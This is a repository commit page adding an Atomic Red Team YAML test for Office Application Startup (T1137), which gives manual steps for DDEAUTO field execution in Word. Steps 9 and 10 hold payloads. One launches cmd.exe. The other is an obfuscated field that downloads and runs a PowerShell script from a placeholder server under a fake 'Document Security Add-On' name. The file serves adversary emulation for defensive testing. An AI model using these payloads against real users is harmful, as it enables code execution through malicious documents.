security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1137

Browse Source 
No .. for Casey
Other than the actual ..'s that are in the repo that are legit from Github..
This commit is contained in:
Michael Haag
2018-05-25 10:50:52 -04:00
parent 20a447e63d
commit d508caaffd
1 changed files with 39 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1137/T1137.yaml
+39
View File
@@ -0,0 +1,39 @@
---
attack_technique: T1137
display_name: Office Application Startup
atomic_tests:
- name: DDEAUTO
description: |
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
Word VBA Macro
[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Word
2. Insert tab -> Quick Parts -> Field
3. Choose = (Formula) and click ok.
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
5. Right-click the Field, choose "Toggle Field Codes"
6. Paste in the code from Unicorn or SensePost
7. Save the Word document.
9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"